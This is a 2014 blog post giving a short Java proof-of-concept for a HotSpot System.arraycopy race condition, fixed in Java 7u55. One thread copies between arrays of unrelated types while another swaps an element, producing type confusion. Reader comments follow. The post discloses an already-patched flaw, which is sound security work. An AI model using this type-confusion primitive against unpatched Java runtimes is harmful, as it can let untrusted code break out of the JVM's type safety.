# Wednesday, 16 April 2014
« IKVM.NET 7.4 Release Candidate 0 | Main | Java Method Overriding Is FUBAR Part 9 o... »
Arraycopy HotSpot Vulnerability Fixed in 7u55

Here is a simple PoC exploit for the issue fixed here:

class Union1 { }
class Union2 { }

class arraytoctou {
  static volatile Union1 u1 = new Union1();

  public static void main(String[] args) {
    final Union1[] arr1 = new Union1[1];
    final Union2[] arr2 = new Union2[1];
    new Thread() {
      public void run() {
        for(;;) {
          try {
            System.arraycopy(arr1, 0, arr2, 0, 1);
            if (arr2[0] != null) break;
          } catch (Exception _) { }
        }
      }
    }.start();

    while (arr2[0] == null) {
      arr1[0] = null;
      arr1[0] = u1;
    }

    System.out.println(arr2[0]);
  }
}

Wednesday, 16 April 2014 10:40:19 (W. Europe Daylight Time, UTC+02:00)  #    Comments [2]
Sunday, 04 May 2014 02:53:54 (W. Europe Daylight Time, UTC+02:00)
Congrats! Awesome bug.
Tuesday, 06 May 2014 08:05:32 (W. Europe Daylight Time, UTC+02:00)
I did not discover this vulnerability.
Name
E-mail
Home page

I apologize for the lameness of this, but the comment spam was driving me nuts. In order to be able to post a comment, you need to answer a simple question. Hopefully this question is easy enough not to annoy serious commenters, but hard enough to keep the spammers away.

Anti-Spam Question: What method on java.lang.System returns an object's original hashcode (i.e. the one that would be returned by java.lang.Object.hashCode() if it wasn't overridden)? (case is significant)

Answer:  
Comment (HTML not allowed)  

Live Comment Preview